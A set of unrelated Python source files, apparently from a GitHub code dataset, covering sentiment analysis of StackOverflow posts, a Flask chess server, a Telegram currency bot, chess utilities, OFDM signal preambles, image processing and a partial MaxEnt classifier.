communityValue = 1\n\n insertionCounter = 0\n ignoredCounter = 0\n\n\n # analyze the score\n\n # after a certain amount of rows the data should be committed into the database so that it doesn't have to commit all\n # tuples at the end\n rowCounter = 0\n for row in reader:\n if rowCounter == 0:\n rowCounter += 1\n continue\n rowCounter += 1\n body = row[8]\n # needed because the sql command cannot handle strings with ' as it is the sql string symbol\n body = body.replace(\"'\", \" \")\n #some answers were just code, so these were completely wiped out and now do not have anything to analyze\n if len(body) == 0:\n ignoredCounter += 1\n continue\n # get the single liens of the string\n linesOfBody = body.splitlines()\n\n # I average the value of the sum of values of all lines and also further down analyze the whole body at once to have a comparison for the analysis\n sumOfScores = [0, 0, 0, 0]\n emptyLinesCounter = 0\n #print(rowCounter-1)\n for line in linesOfBody:\n if line != \"\":\n score = sentiment_analyzer_scores(line)\n sumOfScores[0] += score[\"neg\"]\n sumOfScores[1] += score[\"neu\"]\n sumOfScores[2] += score[\"pos\"]\n sumOfScores[3] += score[\"compound\"]\n else:\n emptyLinesCounter += 1\n wholeScore = sentiment_analyzer_scores(body)\n\n # some posts still have newline characters, so they are not caught by the previous empty check\n if len(linesOfBody) - emptyLinesCounter == 0:\n ignoredCounter += 1\n continue\n #average all the values\n sumOfScores[0] = sumOfScores[0]/(len(linesOfBody)-emptyLinesCounter)\n sumOfScores[1] = sumOfScores[1] / (len(linesOfBody) - emptyLinesCounter)\n sumOfScores[2] = sumOfScores[2] / (len(linesOfBody) - emptyLinesCounter)\n sumOfScores[3] = sumOfScores[3] / (len(linesOfBody) - emptyLinesCounter)\n\n lasteditdate = row[13]\n lasteditorid = row[11]\n tupleString = \"\"\n if lasteditdate == '' or lasteditorid == '':\n tupleString = build_tuple_string(\n [row[0], row[3], row[4], row[6], body, row[9], row[18], sumOfScores[2],\n sumOfScores[0], sumOfScores[1], sumOfScores[3], wholeScore[\"pos\"], wholeScore[\"neg\"], wholeScore[\"neu\"],\n wholeScore[\"compound\"], communityValue])\n insert_tuple_into_database_without_editor(tupleString)\n insertionCounter += 1\n else:\n tupleString = build_tuple_string([row[0], row[3], row[4], row[6], body, row[9], lasteditorid, lasteditdate, row[18], sumOfScores[2], sumOfScores[0], sumOfScores[1], sumOfScores[3], wholeScore[\"pos\"], wholeScore[\"neg\"], wholeScore[\"neu\"], wholeScore[\"compound\"], communityValue])\n\n insert_tuple_into_database(tupleString)\n\n insertionCounter += 1\n # exit(0)\n\n # commit all tuples into the databse\n databaseConnection.commit()\n print(\"Inserted \" + str(insertionCounter) + \" into \" + lineFile + \" tuples and omitted \" + str(ignoredCounter) + \" tuples because of no text in the answer body after code cleaning.\")\n print(\"There were \" + str(rowCounter) + \" tuples in total and \" + str(rowCounter-ignoredCounter-1) + \" should have been inserted from that. 
Do the values match?\")\n # example tupel\n # testTupel = \"'555555', '5555', '2020-03-01 04:05:06', '2000', 'hallöle', '-5', '-100', '2020-2-12 07:08:09', '100', '0.2565', '0.356', '0.4565', '0.5565', '0.2565', '0.356', '0.4565', '0.5565'\"\n\n # insert the current tupel\n\n# close the cursor\ndatabaseCursor.close()\ndatabaseConnection.close()\n","repo_name":"GilgusMaximus/PolarityMining-StackOverflow","sub_path":"DataProcessing/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3866999907","text":"from typing import List as tList;\nfrom typing import Tuple as tTuple;\nfrom pygame.sprite import Sprite;\nimport pygame;\nfrom pygame import Vector2;\nfrom machine import State;\n\nclass StateSprite(Sprite):\n\n def __init__(self,\n state: State,\n state_color: tTuple[int, int, int],\n curr_state_color: tTuple[int, int, int],\n text_color: tTuple[int, int, int],\n bg_color: tTuple[int, int, int],\n width: int,\n font: pygame.font.Font):\n\n super().__init__();\n\n self.width = width;\n\n self.state = state;\n self.is_curr = False;\n\n self.font = font;\n\n pos = self.state.pos - Vector2(width // 2);\n\n # Save colors\n\n self.state_color = state_color;\n self.curr_state_color = curr_state_color;\n self.text_color = text_color;\n self.bg_color = bg_color;\n\n # Set up image surface\n\n self.image = pygame.Surface(size = (width, width)); # Creates the initial surface to draw the sprite on\n\n # Set up rect\n\n self.rect = self.image.get_rect();\n self.rect.x = pos[0];\n self.rect.y = pos[1];\n\n # Draw onto surface\n \n self.redraw();\n\n def update(self,\n curr_state: int) -> None:\n\n super().update();\n\n self.is_curr = curr_state == self.state.n;\n\n self.redraw();\n\n def redraw(self) -> None:\n\n self.image.fill(color = self.bg_color); # Fills the surface with the background color\n self.image.set_colorkey(self.bg_color); # Sets what color pixels count as transparent pixels\n\n # Draw circle to surface\n\n color = (self.state_color) if (not self.is_curr) else (self.curr_state_color);\n\n pygame.draw.circle(\n surface = self.image,\n color = color,\n center = Vector2(self.width // 2),\n radius = self.width // 2\n );\n\n # Write n on circle\n \n text = self.font.render(\n str(self.state.n),\n True,\n self.text_color,\n None\n );\n \n text_width = text.get_rect().width;\n text_height = text.get_rect().height;\n\n text_pos = Vector2(self.width // 2);\n text_pos[0] -= text_width // 2;\n text_pos[1] -= text_height // 2;\n\n self.image.blit(\n source = text,\n dest = text_pos\n );\n\n def set_is_curr(self,\n b: bool) -> None:\n self.is_curr = b;\n\n def check_pos_in_sprite(self,\n pos: Vector2\n ) -> bool:\n\n \"\"\"Checks whether the provided position is in the bounds of this state. 
Bounds are taken to be in the shape of a circle around the center\"\"\"\n        \n        disp = pos - self.state.pos;\n        sqr_d = disp.magnitude_squared();\n\n        return sqr_d <= (self.width/2)**2;\n","repo_name":"ofsouzap/TuringMachineEditor","sub_path":"state_sprite.py","file_name":"state_sprite.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42089016161","text":"\nfrom create_gamma_ij import *\n\ndef get_current_cost(db):\n\tW = db['W_matrix']\n\tiv = np.array(range(db['N']))\n\tjv = iv\n\n\n\tI = np.eye(W.shape[1])\n\n\t#\tSetting up the cost function\n\tcost_foo = 0\n\tfor i in iv:\n\t\tfor j in jv:\n\t\t\t\n\t\t\tx_dif = db['data'][i] - db['data'][j]\n\t\t\tx_dif = x_dif[np.newaxis]\n\t\t\n\t\t\tgamma_ij = create_gamma_ij(db, db['y_tilde'], i, j)\n\t\t\tcost_foo = cost_foo - gamma_ij*np.exp(-x_dif.dot(W).dot(W.T).dot(x_dif.T))\n\n\treturn cost_foo\n\n","repo_name":"taohong08/ISM","sub_path":"lib/get_current_cost.py","file_name":"get_current_cost.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17393207604","text":"import fnmatch\nimport os\n\nimport chess\nimport pandas as pd\nimport torch\n\n\ndef get_device():\n    \"\"\"\n    Checks which device is most appropriate to perform the training.\n    If cuda is available, cuda is returned, otherwise mps or cpu.\n\n    Returns\n    -------\n    str\n        the device which is used to perform the training.\n\n    \"\"\"\n    _device = (\n        \"cuda\"\n        if torch.cuda.is_available()\n        else \"mps\"\n        if torch.backends.mps.is_available()\n        else \"cpu\"\n    )\n\n    print(f\"We are going to use {_device} device ...\")\n    return _device\n\n\ndef get_files_from_pattern(directory, file_pattern):\n    \"\"\"\n\n    Parameters\n    ----------\n    directory : str\n        a directory\n    file_pattern : str\n        a file name pattern\n\n    Returns\n    -------\n    list\n        Returns all files (including directory) matching the pattern in the given directory\n\n    \"\"\"\n    matching_files = [file for file in os.listdir(directory) if fnmatch.fnmatch(file, file_pattern)]\n    return [os.path.join(directory, file) for file in matching_files]\n\n\ndef dataframe_from_files(file_names_with_directory, pickle_files=False):\n    \"\"\"\n\n    Parameters\n    ----------\n    directory : str\n        a directory\n    file_names_with_directory : list\n        a list of file names\n\n\n    Returns\n    -------\n    pd.Dataframe\n        a single Dataframe of all the given files in the given directory without the index\n\n    \"\"\"\n    _dataframes = []\n    for file_name_with_directory in file_names_with_directory:\n        print(f\"Read {file_name_with_directory} ...\")\n        if pickle_files:\n            _dataframes.append(pd.read_pickle(file_name_with_directory))\n        else:\n            _dataframes.append(pd.read_csv(file_name_with_directory))\n\n    return pd.concat(_dataframes, ignore_index=True)\n\n\ndef write_values_in_bars(curr_plot):\n    \"\"\"\n    Writes the values from bar plots into the bars.\n    \"\"\"\n    for p in curr_plot.patches:\n        curr_plot.annotate(format(p.get_height(), '.1f'),\n                           (p.get_x() + p.get_width() / 2., p.get_height()),\n                           ha='center', va='center',\n                           xytext=(0, 9),\n                           textcoords='offset points')\n\n\n# Check checkmate\ndef is_checkmate(fen) -> bool:\n    \"\"\"\n    Checks if FEN is representing a checkmate position.\n\n    Parameters\n    ----------\n    fen String input as FEN\n\n    Returns\n    -------\n    True if checkmate\n    \"\"\"\n    board = chess.Board()\n    board.set_fen(fen)\n    return board.is_checkmate()\n\n\n# The stalemate is a position where one player has no legal moves available and they are not in check.\ndef is_stalemate(fen) -> bool:\n    \"\"\"\n    Checks if FEN is representing as stalemate.\n\n    Parameters\n    ----------\n    fen String input as FEN\n\n    Returns\n    -------\n    true if stalemate\n    \"\"\"\n    board = chess.Board()\n    board.set_fen(fen)\n    return board.is_stalemate()\n\n\ndef get_valid_positions(current_position):\n    legal_moves_fen = []\n    try:\n        board = chess.Board(current_position)\n        legal_moves = list(board.legal_moves)\n        for move in legal_moves:\n            # reset\n            new_board = chess.Board(current_position)\n            new_board.push_uci(move.uci())\n            legal_moves_fen.append(new_board.fen())\n    finally:\n        return legal_moves_fen\n","repo_name":"danielh1307/chessmait","sub_path":"src/lib/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"72054136787","text":"from time import time\nfrom tracemalloc import start\nimport numpy as np\nimport scipy.signal\nfrom math import ceil\ntry:\n    from utils import ofdm,encode #handles both file in utils folder and outside utils folder\nexcept:\n    import ofdm,encode\n\ndef generate_chirp(duration, fs, low=20, high=20000, silence_duration=0, double=False):\n    \"\"\"Return a chirp signal using the given parameters\n\n    :param duration: duration of a single chirp (in secs)\n    :param fs: sampling frequency\n    :param low: lower bound of chirp freq, defaults to 20\n    :param high: upper bound of chirp freq, defaults to 20000\n    :param silence_duration: duration of silence before the chirp signal (in secs), defaults to 0\n    :param double: generate double chirp if True, defaults to False\n    :return: ndarray of the chirp signal with delay\n    \"\"\"\n    sample_times = np.linspace(0, duration, fs * duration)\n    chirp = scipy.signal.chirp(sample_times, low, duration, high)\n    silence = np.zeros(ceil(fs * silence_duration))\n\n    if double:\n        delayed_chirp = np.append(silence, np.tile(chirp, 2))\n    else:\n        delayed_chirp = np.append(silence, chirp)\n    \n    return delayed_chirp\n\ndef generate_known_ofdm(fs,dft_length,cp_length,low_freq,high_freq,encode_method,repeat_time, seed):\n    if encode_method == 'bpsk':\n        bits_per_symbol = 1\n    elif encode_method == 'qpsk':\n        bits_per_symbol = 2\n    \n\n    spb = ofdm.subcarriers_per_block(fs,dft_length,low_freq,high_freq)\n    np.random.seed(seed)\n    known_string = np.random.randint(2,size=2*spb)\n    known_string_stack = np.tile(known_string,repeat_time-1) #generate one ofdm symbol with prefix (cp length normal), the rest without (cp length set to 0)\n\n    #convert string to complex symbols\n    if encode_method == 'qpsk':\n        symbols_first = encode.qpsk_encode(known_string)\n        symbols_rest = encode.qpsk_encode(known_string_stack)\n    elif encode_method == 'bpsk':\n        symbols_first = encode.bpsk_encode(known_string)\n        symbols_rest = encode.bpsk_encode(known_string_stack)\n\n    #print(symbols_rest[::spb]) #first complex info qpsk\n\n    #convert string of info to ofdm data\n    known_shifted_first = ofdm.subcarrier_shift_gaussian(symbols_first, dft_length, fs, low_freq, high_freq, 0.01, bits_per_symbol, constellation=encode_method)\n    known_ofdm_data_first = ofdm.symbols_to_ofdm(known_shifted_first, dft_length, cp_length)\n    \n    #known_shifted_rest = ofdm.subcarrier_shift_gaussian(symbols_rest, dft_length, fs, low_freq, high_freq, 0.01, bits_per_symbol, constellation=encode_method)\n    known_shifted_rest = np.tile(known_shifted_first,repeat_time-1)\n    known_ofdm_data_rest = ofdm.symbols_to_ofdm(known_shifted_rest, dft_length, cp_length=0)\n\n    #combine the two parts\n    known_ofdm_data = np.concatenate((known_ofdm_data_first,known_ofdm_data_rest))\n    return known_ofdm_data,symbols_first\n\ndef transmission_start(fs,low_freq,high_freq,silence_duration):\n    start_audio = generate_chirp(1, fs, low=low_freq, high=high_freq, silence_duration=silence_duration, double=False)\n    return start_audio\n\ndef transmission_end(fs,low_freq,high_freq,silence_duration):\n    chirp = generate_chirp(1, fs, low=low_freq, high=high_freq, silence_duration=0, double=False)\n    silence = np.zeros(ceil(fs * silence_duration))\n    end_audio = np.append(chirp,silence)\n    return end_audio\n\ndef frame_assemble(chirp,known_ofdm,data):\n    return np.concatenate((chirp,np.real(known_ofdm),np.real(data),np.real(known_ofdm),chirp))\n\ndef load_known_ofdm(CP_LENGTH = 512,repeat_time = 4):\n    known_ofdm_symbol = np.load(\"known_ofdm_symbol.npy\")\n    time_domain = np.fft.ifft(known_ofdm_symbol)\n    cyclic_prefix = time_domain[-CP_LENGTH:]\n    stacked = np.tile(time_domain, repeat_time)\n    return np.append(cyclic_prefix,stacked)\n\nif __name__ == \"__main__\": #used for debugging functions, only run if running this file alone\n    # known_ofdm = generate_known_ofdm(fs = 48000,dft_length=8192,cp_length=1024,low_freq=1000,high_freq=10000,encode_method='qpsk',repeat_time=5, seed=0)\n    # a = known_ofdm[1024:]\n    # spb = 1536\n    # print(a[200::8192]) #should be the same\n    import sounddevice as sd\n    import matplotlib.pyplot as plt\n    fs = 48000\n    start_header = transmission_start(fs,1000,10000,1.2)\n    plt.plot(start_header)\n    plt.show()\n    sd.play(start_header,fs,blocking=True)\n    ","repo_name":"yichen-song/IIA_Project_GF3_Group_1","sub_path":"utils/preamble.py","file_name":"preamble.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1510906846","text":"#!/usr/bin/env python\nfrom threading import Lock\nfrom flask import Flask, render_template, session, request, \\\n    copy_current_request_context,request,jsonify\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n    close_room, rooms, disconnect\nimport sys\nimport json\nfrom Player import Player\nasync_mode = None\n\napp = Flask(__name__, static_folder='public', static_url_path='')\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, async_mode=async_mode)\nthread = None\nthread_lock = Lock()\n\n\ndef background_thread():\n    \"\"\"Example of how to send server generated events to clients.\"\"\"\n    count = 0\n    while True:\n        socketio.sleep(10)\n        count += 1\n        socketio.emit('my_response',\n                      {'data': 'Server generated event', 'count': count},\n                      namespace='/test')\n\n\n@app.route('/')\ndef index():\n    return render_template('menu.html', async_mode=socketio.async_mode)\n\napp.route('/index')\ndef game(name):\n    return render_template('index.html')\n\n@app.route('/')\ndef generic(name):\n    global PlayerA\n    global PlayerB\n    if name == \"index\":\n        \n        global numberofplayer\n        if numberofplayer<2:\n            numberofplayer+=1\n            if PlayerA ==0:\n                PlayerA = Player(\"White\",True)\n                return render_template(name + '.html',turn='true',name='white')\n            elif PlayerB == 0:\n                PlayerB = Player(\"Black\",False)\n                return render_template(name + '.html',turn='false',name='black')\n        else:\n            return render_template('cannotplay.html')\n    else:\n        return render_template(name+'.html')\n\n@socketio.on('join', namespace='/test')\ndef join(message):\n    join_room(message['room'])\n    session['receive_count'] = session.get('receive_count', 0) + 1 \n    emit('my_response',\n         {'data': 'In rooms: ' + ', '.join(rooms()),\n          'count': session['receive_count']})\n\n#May use for disconnecting player\n# @socketio.on('leave', namespace='/test')\n# def leave(message):\n#     leave_room(message['room'])\n#     session['receive_count'] = session.get('receive_count', 0) + 1\n#     emit('my_response1',\n#          {'data': 'In rooms: ' + ', '.join(rooms()),\n#           'count': session['receive_count']})\n# @socketio.on('disconnect', namespace='/test')\n# def test_disconnect():\n#     print('Client disconnected', request.sid)\n\n@socketio.on('my_room_event', namespace='/test')\ndef send_room_message(message):\n    global PlayerA\n    global PlayerB\n    if PlayerA!=0 and PlayerB!=0:\n        PlayerA.ismove = not PlayerA.ismove\n        PlayerB.ismove = not PlayerB.ismove\n    \n    session['receive_count'] = session.get('receive_count', 0) + 1\n    \n    \n    emit('my_response1',\n         {'data': message['data'], 'count': session['receive_count']},\n         room=message['room'])\n\n#USELESS\n#@socketio.on('my_ping', namespace='/test')\n#def ping_pong():\n    # emit('my_pong')\n    \n#@app.route('/postmethod', methods = ['POST'])\n#def get_post_javascript_data():\n    # if request.method == \"POST\":\n    #     jsdata = json.loads(request.form['javascript_data'])\n    #     gamepiece = jsdata[0]['piece']\n    #current_loc = jsdata[0]['current_loc']\n    #new_loc = jsdata[0]['new_loc']\n    #return jsonify(gamepiece,current_loc,new_loc)\n\nif __name__ == '__main__':\n    PlayerA = 0\n    PlayerB = 0\n    numberofplayer=0\n    socketio.run(app, debug=True)\n","repo_name":"AlexJin366/C.H.E.S.S--Game","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1017778887","text":"import numpy as np\nimport moderngl\nclass Blur:\n    def __init__(self, ctx, vs, fs):\n\n        self.ctx = ctx\n\n        # Init Blur\n        self.vbo = self.ctx.buffer(np.float32([-1,-1,1,-1,-1,1,-1,1,1,-1,1,1]))\n        self.prog = self.ctx.program(\n            vertex_shader = vs,\n            fragment_shader = fs)\n        self.vao = self.ctx.simple_vertex_array(self.prog, self.vbo, \"a_pos\")\n        self.tex = [None for i in range(2)]\n        self.fbo = [None for i in range(2)]\n\n    def build(self, w, h, d = 3, dt = \"f2\"):\n        self.w, self.h, self.d, self.dt = w, h, d, dt\n\n        # Build Textures\n        for i in range(2):\n            if self.tex[i] is not None:\n                self.tex[i].release()\n            self.tex[i] = self.ctx.texture((w, h), d, dtype=dt)\n\n        # Buld FBO's\n        for i in range(2):\n            if self.fbo[i] is not None:\n                self.fbo[i].release()\n            self.fbo[i] = self.ctx.framebuffer([self.tex[i]])\n\n        self.prog[\"u_res\"].value = self.fbo[0].size\n        self.prog[\"u_tex\"].value = 0\n\n    def blur(self, tex, out, n=0, s=2):\n        self.prog[\"u_size\"].value = s\n\n        self.blit(tex, self.fbo[0])\n        for i in range(n):\n            self.blur_once()\n        self.blit(self.tex[0], out)\n\n    def blur_once(self):\n        self.tex[0].use(0)\n        self.prog[\"u_mode\"].value = 1\n        self.fbo[1].use()\n        self.vao.render()\n        self.tex[1].use(0)\n        self.prog[\"u_mode\"].value = 2\n        self.fbo[0].use()\n        self.vao.render()\n\n    def blit(self, tex, out):\n        tex.use(0)\n        out.use()\n        self.prog[\"u_mode\"].value = 0\n        self.vao.render()\n\n    def tex_fbo(self):\n        tex = self.ctx.texture((self.w, self.h), self.d, dtype=self.dt)\n        fbo = self.ctx.framebuffer([tex])\n        return (tex, fbo)\n","repo_name":"onetaste108/rdapp_web","sub_path":"src/main/python/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39795320555","text":"A = [0, -1, 2, -3, 1]\n\nsum = -2\n\nsize = len(A)\n\nfor i in range(0,size):\n    for j in range(i+1, size):\n        if A[i] + A[j] == sum:\n            print(f\"Pair with a given sum is ({A[i]},{A[j]})\")\n            break","repo_name":"nishantpanwar18/Python","sub_path":"Learning/find_pair_with_given_sum.py","file_name":"find_pair_with_given_sum.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"171265325","text":"import telebot\nfrom our_token import token\nfrom constants import *\nfrom extensions import *\n\nTOKEN = token\n# TOKEN = _token\n\nbot = telebot.TeleBot(TOKEN)\n\n# обработчик команд\n@bot.message_handler(commands=['start'])\ndef handle_start_command(message):\n    text = f'Приветствую, {message.chat.first_name}. Я - бот. Моя задача получить от тебя команду (/start, /help, /values) ' \\\n           f'или 3 параметра для исчисления конвертации\\n' \\\n           f'\\nКонвертация происходит по следующим правиламвы мне 3 параметра через пробел в виде ' \\\n           f'<исходная валюта> <валюта в которую надо перевести> <количество у.е.>, а я вам результат выдаю'\n    bot.reply_to(message, text)\\\n\n\n@bot.message_handler(commands=['help'])\ndef handle_help_command(message):\n    text = f'{message.chat.first_name}, конвертация валюты происходит по следующим правилам: ' \\\n           f'вы мне 3 параметра через пробел в виде <исходная валюта> <валюта в которую надо перевести> <количество у.е.>, ' \\\n           f'а я вам результат выдаю'\n    bot.reply_to(message, text)\n\n\n# обработчик команды /values\n@bot.message_handler(commands=['values'])\ndef handle_values_command(message):\n    text = 'Доступные валюты:'\n    for item in currency.keys():\n        text += f'\\n\\t\\t\\t{item}'\n    bot.reply_to(message, text)\n\n\n# здесь обрабатывается входящее сообщение состоящие из исходной валюты\n@bot.message_handler(content_types=[\"text\"])\ndef handle_request(message: telebot.types.Message):\n    try:\n        values = message.text.split(' ')\n        if len(values) > 3:\n            bot.reply_to(message, 'Параметров должно быть 3, а ты сколько прислал? БОЛЬШЕ!!')\n        elif len(values) < 3:\n            bot.reply_to(message, 'Такая простая просьба и то слабоват =( Я просил 3 аргумента, никак не меньше!')\n        else:\n            base, quote, amount = values\n\n            total_quote = Exchange.get_price(base, quote, amount)\n\n            for key, value in currency.items():\n                if base in value:\n                    base = key\n                if quote in value:\n                    quote = key\n\n            text = f'Первод из {base} в {quote} состоялся:\\n{amount} {base} = {total_quote} {quote}'\n\n            bot.send_message(message.chat.id, text)\n    except Exception as e:\n        if type(e) == APIException:\n            bot.reply_to(message, f'Ошибка пользователя. Лузер\\n\\n{e}')\n            pass\n        bot.reply_to(message, f'Что-то пошло не так.\\n\\n{e}')\n\nbot.polling(none_stop=True)","repo_name":"volshebstvuyu/module18_TelegramBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"28446194332","text":"filein = open(\"day10/input.txt\", \"r\")\n\nlines = filein.readlines()\n\nvalues = [1] # each index is a cycle\n\ndef processInput():\n    for line in lines:\n        line = line.split()\n        \n        if line[0] == \"addx\":\n            values.append(int(values[-1]))\n            values.append(int(values[-1]) + int(line[1]))\n        \n        elif line[0] == \"noop\":\n            values.append(int(values[-1]))\n        \n    return values\n\ndef calculateSum(values):\n    total = 0\n    for i in range(20, 221, 40):\n        total += values[i - 1] * i\n    \n    return total\n\ndef printCRT(values):\n    sprite = 0\n    for i in range(len(values)): \n        if i % 40 == 39:\n            end = \"\\n\"\n        elif i % 40 == 0:\n            end = \"\"\n            sprite = 0\n        else:\n            end = \"\"\n            sprite += 1\n        \n        if abs(values[i] - sprite) <= 1:\n            print(\"#\", end=end)\n        else:\n            print(\".\", end=end)\n\nvalues = processInput()\n\nprint(\"part1:\", calculateSum(values))\nprint(\"part2:\")\nprintCRT(values)\n \n\n \n \n \n \n \n \n","repo_name":"DerpTaterTot/adventofcode2022","sub_path":"day10/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"28570526064","text":"#Dana jest N-elementowa tablica T, zawierająca liczby. Proszę napisać funkcję, która zwróci indeks\n#największej liczby, która jest iloczynem wszystkich liczb pierwszych leżących w tablicy na indeksach\n#mniejszych od niej lub None, jeżeli taka liczba nie istnieje.\n\nimport math\n\ndef is_prime(num):\n    if num <= 1:\n        return False\n    if num == 2 or num == 3:\n        return True\n    if num % 2 == 0 or num % 3 == 0:\n        return False\n    for i in range(5, math.isqrt(num) + 1, 6):\n        if num % i == 0 or num % (i + 2) == 0:\n            return False\n    return True\n\ndef solve(t):\n    biggest = 0\n    for i in range(len(t)):\n        product = 1\n        max_ind = t[i] - 1\n        while max_ind > 0:\n            if is_prime(t[max_ind]):\n                product *= t[max_ind]\n            max_ind -= 1\n        if product == t[i] and t[i] > biggest:\n            biggest = t[i]\n            biggest_ind = i\n    if biggest_ind == 0:\n        return None\n    else: return biggest_ind\n\nprint(solve([1, 3, 1, 3, 4, 2, 6]))","repo_name":"klark142/Introduction_to_Computer_Science","sub_path":"Kolokwia/2021_1b.py","file_name":"2021_1b.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38193775105","text":"from fastapi import APIRouter, Depends\nfrom fastapi.responses import JSONResponse\nfrom typing import List, Annotated\nfrom middlewares.JWTBearer import jwt_bearer\nfrom dataModels.paquete import PaqueteBase\nfrom dataModels.consolidado import ConsolidadoBase\nfrom src.database.db_package import precarga_paquetes, get_consolidado, get_paquete, invoice_search\nfrom src.database.db_auth import roles_match\nfrom src.Roles import Roles\n\npackage_router = APIRouter()\n\n\n@package_router.post(\"/precarga\", tags=[\"precarga\"])\ndef upload_precarga(paquetes: List[PaqueteBase], consolidado: ConsolidadoBase,\n                    user_id: Annotated[int, Depends(jwt_bearer)]):\n    if not roles_match(user_id, Roles.EDITOR) and not roles_match(user_id, Roles.ADMIN):\n        return JSONResponse(content={\"message\": \"Usuario no autorizado para PRECARGA\"}, status_code=403)\n    try:\n\n        precarga_paquetes(paquetes, consolidado, user_id)\n\n    except ValueError as e:\n        # Dinstincion entre errores esperados\n        error_message = str(e)\n        if 'integridad' in error_message:\n            status_code = 409\n        else:\n            status_code = 400\n        return JSONResponse(content={\"message\": error_message}, status_code=status_code)\n\n    except Exception as e:\n        # Manejo de otros errores\n        return JSONResponse(content={\"message\": str(e)}, status_code=500)\n\n    return JSONResponse(content={\"message\": \"Precarga exitosa\"}, status_code=201)\n\n\n@package_router.get(\"/get/consolidado/{consolidado_id}\", tags=[\"precarga\"])\ndef get_consolidado_endpoint(consolidado_id: int, user_id: Annotated[int, Depends(jwt_bearer)]):\n    consolidado = get_consolidado(consolidado_id)\n    return JSONResponse(content=consolidado, status_code=200)\n\n\n@package_router.get(\"/get/paquete/{paquete_id}\", tags=[\"precarga\"])\ndef get_paquete_endpoint(paquete_id: int, user_id: Annotated[int, Depends(jwt_bearer)]):\n    try:\n        paquete = get_paquete(paquete_id)\n        return JSONResponse(content=paquete, status_code=200)\n\n    except Exception as e:\n        return JSONResponse(content={\"message\": str(e)}, status_code=500)\n\n\n@package_router.get(\"/search/invoice/{invoice}\", tags=[\"precarga\"])\ndef get_invoice_endpoint(invoice: str, user_id: Annotated[int, Depends(jwt_bearer)]):\n    paquetes = invoice_search(invoice)\n    return JSONResponse(content=paquetes, status_code=200)\n","repo_name":"gusanitor8/SLIAnicamBackend","sub_path":"routers/package_router.py","file_name":"package_router.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"11905707131","text":"import cv2\r\nimport numpy as np\r\n\r\ndef main():\r\n    filename = \"images/lena.jpg\"\r\n    img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\r\n    cv2.imshow('image', img)\r\n\r\n    Hist = np.zeros((256))\r\n    ysize = img.shape[0]\r\n    xsize = img.shape[1]\r\n\r\n    for y in range(ysize):\r\n        for x in range(xsize):\r\n            Hist[img.item(y, x)] = Hist[img.item(y, x)] + 1\r\n\r\n    normHist = np.empty((256))\r\n    sum = 0.0\r\n    factor = 255.0 / (ysize * xsize)\r\n\r\n    for i in range(256):\r\n        sum += Hist[i]\r\n        normHist[i] = round(sum * factor)\r\n\r\n    for y in range(ysize):\r\n        for x in range(xsize):\r\n            img.itemset((y, x), normHist[img.item(y, x)])\r\n\r\n    cv2.imshow('result', img)\r\n    cv2.waitKey(0)\r\n    cv2.destroyAllWindows()\r\n\r\nmain()","repo_name":"ryanjung94/OpenCV_Lecture","sub_path":"histogram_equalization.py","file_name":"histogram_equalization.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71674282705","text":"from collections import defaultdict\nimport math\n#https://vimsky.com/article/714.html\n#https://vimsky.com/article/776.html\n\nclass MaxEnt(object):\n\n    def __init__(self):\n        self.feats = defaultdict(int)\n        self.trainset = []\n        self.labels = set()\n\n    def load_data(self, file):\n        import pdb;pdb.set_trace()\n        for line in open(file):\n            fields = line.strip().split()\n\n            # at least two columns\n            if len(fields) < 2:\n                continue\n            # the first column is label\n            label = fields[0]\n            self.labels.add(label)\n\n            for f in set(fields[1:]):\n                # (label,f) tuple is feature\n                self.feats[(label, f)] += 1\n            self.trainset.append(fields)\n        \n        print(self.trainset)\n\n    def _initparams(self):\n\n        self.size = len(self.trainset)#15\n        # M param for GIS training algorithm\n        self.M = max([len(record) - 1 for record in self.trainset])#3\n        self.ep_ = [0.0] * len(self.feats)#len:12个特征函数\n\n        for i, f in enumerate(self.feats):\n            # calculate feature expectation on empirical distribution,经验分布\n            # E_p*(f_i)\n            self.ep_[i] = float(self.feats[f]) / float(self.size)\n            # each feature function correspond to id\n            self.feats[f] = i\n\n        # init weight for each feature\n        self.w = [0.0] * len(self.feats)\n\n        self.lastw = self.w\n\n    def probwgt(self, features, label):\n        wgt = 0.0\n        #计算sum_i(w_i*f_i(x,y))\n        for f in features:\n            if (label, f) in self.feats:\n                wgt += self.w[self.feats[(label, f)]]\n        \n        #exp(sum_i(w_i*f_i(x,y)))\n        return math.exp(wgt)\n\n    \"\"\"\n    calculate feature expectation on model 